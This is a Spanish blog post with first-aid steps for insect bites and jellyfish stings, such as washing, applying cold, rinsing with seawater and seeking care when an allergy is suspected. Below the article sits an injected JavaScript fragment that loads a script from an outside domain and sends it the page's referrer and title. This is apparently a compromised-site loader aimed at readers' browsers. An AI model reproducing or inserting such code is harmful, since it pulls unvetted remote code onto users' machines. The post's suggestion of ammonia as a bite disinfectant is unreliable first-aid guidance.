Salud y belleza » Enfermedades, Salud

Qué hacer cuando te pica una medusa u otro bicho del verano

Sin Comentarios

En verano es más habitual que suframos picaduras de mosquitos, avispas, abejas y otros insectos, además de las frecuentes e incómodas picaduras de medusas. Para aliviar y tratar todas esas picaduras es necesario seguir una serie de pasos.

picaduras-medusa

Las reacciones más habituales a la picadura dependen del insecto o el animal que te pique. La mayoría de las personas solo sufre un dolor localizado, picazón, hinchazón y enrojecimiento. También pueden sufrir entumecimiento, hormigueo o ardor, aunque la mayoría de las picaduras no conlleva ningún riesgo mayor. Solo algunas personas suelen sufrir una reacción alérgica grave que produciría complicaciones severas.

Los expertos recomiendan acudir a urgencias cuando se trate de múltiples picaduras, cuando la persona es alérgica o cuando tenga una sensación de malestar general. Para aliviar y tratar las picaduras de insectos estos son los pasos que debes seguir:

- Limpiar la picadura con agua y jabón.

- Aplicar frío donde se haya producido la picadura con un hielo envuelto en un paño de tela.

- A continuación es recomendable poner algún desinfectante sobre la picadura: amoníaco, lociones descongestivas y antipruriginosas, talco líquido, polidocanol… también puedes hacer un desinfectante casero con bicarbonato y agua o vinagre.

Por otro lado, en caso de que sea una picadura de medusa los síntomas que suelen aparecer son ronchas, inflamación y vesículas y que en los niños al tener la piel más fina suelen tener síntomas algo más graves. Para tratar una picadura de medusa hay que seguir los siguientes pasos:

- Lavar con agua de mar.

- No rascar la herida ni aplicar amoniaco ni orina.

picaduras-verano

- Acudir a un puesto de socorro o quitar los restos con algún plástico duro o pinzas.

- Aplicar frío local durante 10 minutos para aliviar el dolor.

- Si los síntomas se agravan lo mejor es acudir al hospital.

¿Has sufrido alguna picadura este verano?

if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.